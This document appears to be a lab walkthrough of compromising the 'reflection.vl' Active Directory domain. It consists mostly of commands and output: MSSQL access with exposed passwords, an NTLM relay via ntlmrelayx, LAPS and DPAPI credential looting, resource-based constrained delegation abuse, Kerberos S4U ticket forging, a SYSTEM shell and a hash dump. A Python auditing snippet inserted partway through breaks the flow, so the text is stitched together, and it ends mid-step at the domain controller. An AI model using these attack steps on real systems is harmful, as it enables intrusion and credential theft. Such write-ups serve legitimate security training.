Nmap scan report for 10.10.241.133
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 127
1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
3269/tcp open tcpwrapped syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49673/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
58981/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Nmap scan report for 10.10.241.134
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
445/tcp open microsoft-ds? syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
Nmap scan report for 10.10.241.135
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
445/tcp open microsoft-ds? syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
Connecting to MSSQL and discovering valid user credentials
❯ impacket-mssqlclient ms01.reflection.vl/web_staging:'Washroom510'@10.10.241.134
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MS01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MS01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (web_staging guest@master)>
SQL (web_staging guest@master)> SELECT name FROM master.dbo.sysdatabases;
name
-------
master
tempdb
model
msdb
staging
SQL (web_staging guest@master)> use staging;
SQL (web_staging dbo@staging)> select * from staging.information_schema.tables;
TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE
------------- ------------ ---------- ----------
staging dbo users b'BASE TABLE'
SQL (web_staging dbo@staging)> select * from users
id username password
-- -------- -------------
1 b'dev01' b'Initial123'
2 b'dev02' b'Initial123'
SQL (web_staging dbo@staging)>
NTLM Relay Attack via socks proxy
The previous enumeration indicated that some servers did not require SMB signing, making them vulnerable to NTLM relay attacks.
Setting up the ntlmrelayx tool to initiate an interactive shell.
❯ sudo impacket-ntlmrelayx -smb2support -t 10.10.241.133 -i
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client SMTP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server on port 445
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Multirelay disabled
[*] Servers started, waiting for connections
Triggering the authentication to perform the relay
[*] SMBD-Thread-5 (process_request_thread): Received connection from 10.10.241.134, attacking target smb://10.10.241.133
[*] Authenticating against smb://10.10.241.133 as REFLECTION/SVC_WEB_STAGING SUCCEED
[*] Started interactive SMB client shell via TCP on 127.0.0.1:11000
Downloading the production database user's credentials from the prod share.
❯ nc 127.0.0.1 11000
Type help for list of commands
# shares
ADMIN$
C$
IPC$
NETLOGON
prod
SYSVOL
# ls
drw-rw-rw- 0 Wed Jun 7 13:44:26 2023 .
drw-rw-rw- 0 Wed Jun 7 13:43:22 2023 ..
-rw-rw-rw- 45 Thu Jun 8 07:24:39 2023 prod_db.conf
# get prod_db.conf
❯ impacket-mssqlclient ms01.reflection.vl/web_prod:'Tribesman201'@10.10.241.133
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
SQL (web_prod guest@master)> SELECT name FROM master.dbo.sysdatabases;
prod
SQL (web_prod guest@master)> use prod;
SQL (web_prod dbo@prod)> select * from prod.information_schema.tables;
TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE
------------- ------------ ---------- ----------
prod dbo users b'BASE TABLE'
SQL (web_prod dbo@prod)> select * from users;
id name password
-- --------------- -----------------
1 b'abbie.smith' b'CMe1x+nlRaaWEw'
2 b'dorothy.rose' b'hC_fny3OK9glSJ'
SQL (web_prod dbo@prod)>
Using the valid credentials, the tester proceeded to enumerate the domain controller with BloodHound.
Reading LAPS password on MS01
The user abbie.smith has GenericAll over MS01, which means this machine can be compromised via RBCD or by reading its LAPS password (RBCD was not possible because MachineAccountQuota is 0).
❯ nxc smb 10.10.210.214 -u 'Administrator' -p 'H447.++h6g5}xi' --local-auth --dpapi
SMB 10.10.210.214 445 MS01 [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:MS01) (signing:False) (SMBv1:False)
SMB 10.10.210.214 445 MS01 [+] MS01\Administrator:H447.++h6g5}xi (Pwn3d!)
SMB 10.10.210.214 445 MS01 [*] Collecting User and Machine masterkeys, grab a coffee and be patient...
SMB 10.10.210.214 445 MS01 [+] Got 10 decrypted masterkeys. Looting secrets...
SMB 10.10.210.214 445 MS01 [SYSTEM][CREDENTIAL] Domain:batch=TaskScheduler:Task:{013CD3ED-72CB-4801-99D7-8E7CA1F7E370} - REFLECTION\Georgia.Price:DBl+5MPkpJg5id
Compromising WS01
Abusing Resource Based Constrained Delegation
❯ impacket-rbcd -delegate-from 'MS01$' -delegate-to 'WS01$' -action 'write' 'REFLECTION.vl/Georgia.Price:DBl+5MPkpJg5id'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] MS01$ can now impersonate users on WS01$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] MS01$ (S-1-5-21-3375389138-1770791787-1490854311-1104)
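As an added defensive example (not the page's code and not Impacket's), the following Python decodes the msDS-AllowedToActOnBehalfOfOtherIdentity security descriptor so an auditor can list which accounts are permitted to act on behalf of a computer, the same data impacket-rbcd prints above. The attribute bytes would normally be read from LDAP; the build_sid/build_sd helpers only construct a sample descriptor carrying the MS01$ SID from the output above, and the ACE access mask is an assumed value.

```python
import struct

SE_DACL_PRESENT = 0x0004          # Control flag: the DACL offset is valid
ACCESS_ALLOWED_ACE_TYPE = 0x00    # ACE type that grants the delegation right


def parse_sid(buf, off):
    """Decode a binary SID at buf[off:]; return (SID string, bytes consumed)."""
    revision, count = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    sid = "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs)
    return sid, 8 + 4 * count


def allowed_to_act(sd):
    """Return SIDs granted by ACCESS_ALLOWED ACEs in the descriptor's DACL."""
    if not sd:  # attribute empty: nobody may act on behalf of this computer
        return []
    revision, _, control, _, _, _, dacl_off = struct.unpack_from("<BBHIIII", sd, 0)
    if revision != 1 or not control & SE_DACL_PRESENT or dacl_off == 0:
        return []
    _, _, acl_size, ace_count, _ = struct.unpack_from("<BBHHH", sd, dacl_off)
    pos, end, sids = dacl_off + 8, dacl_off + acl_size, []
    for _ in range(ace_count):
        ace_type, _, ace_size, _mask = struct.unpack_from("<BBHI", sd, pos)
        if ace_size < 8 or pos + ace_size > end:
            raise ValueError("truncated or malformed ACE")
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sids.append(parse_sid(sd, pos + 8)[0])
        pos += ace_size
    return sids


def build_sid(sid):
    """Encode 'S-1-5-21-...' into the binary SID layout (constructed test data)."""
    rev, auth, *subs = (int(p) for p in sid.split("-")[1:])
    return (bytes([rev, len(subs)]) + auth.to_bytes(6, "big")
            + struct.pack("<%dI" % len(subs), *subs))


def build_sd(sids, mask=0x000F01FF):
    """Construct a self-relative SD with one ACCESS_ALLOWED ACE per SID (assumed mask)."""
    aces = b""
    for sid in sids:
        s = build_sid(sid)
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(s), mask) + s
    acl = struct.pack("<BBHHH", 4, 0, 8 + len(aces), len(sids), 0) + aces
    header = struct.pack("<BBHIIII", 1, 0, 0x8000 | SE_DACL_PRESENT, 0, 0, 0, 20)
    return header + acl
```

A non-empty result on a workstation such as WS01 is something a defender should be able to explain; compare it against the computer's expected delegation configuration during regular audits.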
Requesting a service ticket for WS01 via S4U2self/S4U2Proxy
❯ impacket-getST -spn 'cifs/ws01.reflection.vl' -impersonate 'administrator' 'reflection.vl/MS01$' -hashes :c4b7d1086f04073b2b2f71cb075b3d52 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@cifs_ws01.reflection.vl@REFLECTION.VL.ccache
Authenticating to WS01 as NT AUTHORITY\SYSTEM
❯ KRB5CCNAME='administrator@cifs_ws01.reflection.vl@REFLECTION.VL.ccache' impacket-smbexec -k -no-pass ws01.reflection.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>
Dumping SAM and LSA Secrets
❯ KRB5CCNAME='administrator@cifs_ws01.reflection.vl@REFLECTION.VL.ccache' impacket-secretsdump -k -no-pass ws01.reflection.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
<SNIP>
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a29542cb2707bf6d6c1d2c9311b0ff02:::
reflection.vl\Rhys.Garner:knh1gJ8Xmeq+uP
Compromising Domain Controller (DC01)
During enumeration, the tester discovered a user named DOM_RGARNER, whose name resembled the previously obtained username Rhys.Garner. The tester then used NetExec to check the credentials.